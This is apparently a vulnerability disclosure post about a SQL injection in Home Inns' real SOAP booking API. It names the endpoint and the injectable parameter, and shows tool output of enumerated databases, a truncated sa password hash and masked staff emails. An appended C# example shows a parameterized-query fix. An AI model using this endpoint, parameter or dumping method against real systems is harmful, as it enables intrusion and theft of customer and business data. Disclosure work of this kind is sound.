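Home Inns (如家) has been in the news a lot lately, so I'm joining in. The vulnerability is too obvious, and out of consideration for the vendor's privacy and security the title is not spelled out so plainly...
## Spotted while looking at the domain names
## Directory traversal exposes the various interfaces
## Downloaded a few DLLs and disassembled them, with no result; the DLLs are fairly sensitive, since they are effectively the source code
Proof of vulnerability:
Spotting this, experience told me there would be an injection here:
```
http://api.homeinns.com/CrsWebSrv_CV2/CrsWebSrv.asmx
```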
Sure enough, the urn:strLicences parameter in the SOAP request is injectable, and the exposed data includes Motel (莫泰) hotel data:
```
[*] ACT
[*] CRS
[*] CRS_HistoryData
[*] Crs_OrderNo_Builder
[*] HCS
[*] HHotel
[*] homeinns
[*] Hotel
[*] ICRSDB
[*] IVRData
[*] mapbar
[*] master
[*] MDEC
[*] model
[*] MotelHCS
[*] msdb
[*] MT_AgentDB
[*] MT_CRS
[*] MT_Rujia_Transmit
[*] OTA
[*] Rujia_Transmit
[*] tempdb
[*] WebPromotron
```
DBA privileges:
```
[*] sa [1]:password hash:0x0100ffdfb5cb94b23749ebddfeebc5a57a....
```
A count of the homeinns hotel table:
```
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| dbo.hotelinfo | 2242    |
+---------------+---------+
```
A peek at the hotel information, already masked:
```
+------------------------+------+
| email                  | id   |
+------------------------+------+
| a...[email protected]    | 1    |
| wk...[email protected]   | 10   |
| ai....[email protected]  | 100  |
| ha....[email protected]  | 1000 |
| ric....[email protected] | 1001 |
+------------------------+------+
```
MT_AgentDB also contains sync data.
For testing only; that's all.
Fix:
You know...
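
One way to close the injection reported above, shown as an added example that is not from the original report or the vendor's code: an ASMX web method that validates the `strLicences` value and passes it to SQL Server as a typed parameter, using a low-privilege login instead of `sa`. The class name, method name, table and column names, connection string name and licence format are all assumptions made for illustration.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;
using System.Web.Services;

// Hypothetical service: class, method, table and column names are assumptions.
[WebService(Namespace = "urn:example")]
public class LicenceCheckService : WebService
{
    // Assumed licence format: 8 to 64 letters, digits or hyphens.
    private static readonly Regex LicenceFormat =
        new Regex(@"\A[A-Za-z0-9-]{8,64}\z", RegexOptions.CultureInvariant);

    // "CrsReadOnly" is an assumed connection string for a dedicated login that
    // only has SELECT on the table below (not sa, not db_owner), so a query bug
    // cannot reach other databases or password hashes.
    private static string ConnStr =>
        ConfigurationManager.ConnectionStrings["CrsReadOnly"].ConnectionString;

    // Vulnerable pattern (do not use): the SOAP value becomes part of the SQL text.
    //   "SELECT COUNT(*) FROM dbo.Licences WHERE LicenceKey = '" + strLicences + "'"

    [WebMethod]
    public bool IsLicenceValid(string strLicences)
    {
        // Reject anything outside the expected format before touching the database.
        if (strLicences == null || !LicenceFormat.IsMatch(strLicences))
            return false;

        const string sql =
            "SELECT COUNT(*) FROM dbo.Licences WHERE LicenceKey = @licence";

        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // The value travels as a typed parameter and is never parsed as SQL.
            cmd.Parameters.Add("@licence", SqlDbType.VarChar, 64).Value = strLicences;
            conn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```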